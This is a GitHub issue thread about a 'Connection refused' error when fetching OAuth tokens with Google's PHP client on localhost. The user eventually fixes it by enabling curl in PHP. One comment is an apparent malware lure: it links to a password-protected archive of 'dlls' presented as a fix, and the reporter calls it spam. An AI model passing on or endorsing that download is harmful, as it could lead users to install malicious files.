### ISSUE TITLE
Connection refused for URI https://oauth2.googleapis.com/token

### ISSUE THREAD

**Issue by arnabdatta** [googleapis/google-api-php-client#2630]
Hi Team,

I have followed the guide and below is my code, the auth works fine till provide my credential and confirm. When trying to get access token with method fetchAccessTokenWithAuthCode() it is throwing the error 'Connection refused for URI https://oauth2.googleapis.com/token'. I am using localhost for local development.

can anyone please guide/help me? can the localhost be used for local development? I have tried disabling firewall and everything found on google. 

```
<?php
require_once 'vendor/autoload.php';

// init configuration
$clientID = 'XXXX'; // your client id
$clientSecret = 'XXXX'; // your client secret
$redirectUri = 'http://localhost/index.php';

// create Client Request to access Google API
$client = new Google_Client();
$client->setClientId($clientID);
$client->setClientSecret($clientSecret);
$client->setRedirectUri($redirectUri);
$client->addScope("email");
$client->addScope("profile");

// authenticate code from Google OAuth Flow
if (isset($_GET['code'])) {
    try {
    $token = $client->fetchAccessTokenWithAuthCode($_GET['code']);
  //echo $token;
    //$client->setAccessToken($token['access_token']);
    }
    catch(Exception $e) {
        echo 'Message: ' .$e->getMessage();
      }

  
?>
```

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by arnabdatta** [comment]
> This might help:This file might fix it
> 
> https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive codepass: changeme I put the necessary dlls in the archive

dont spam.

**Comment by arnabdatta** [comment]
I resolved it by enabling curl with php in windows, then it worked.
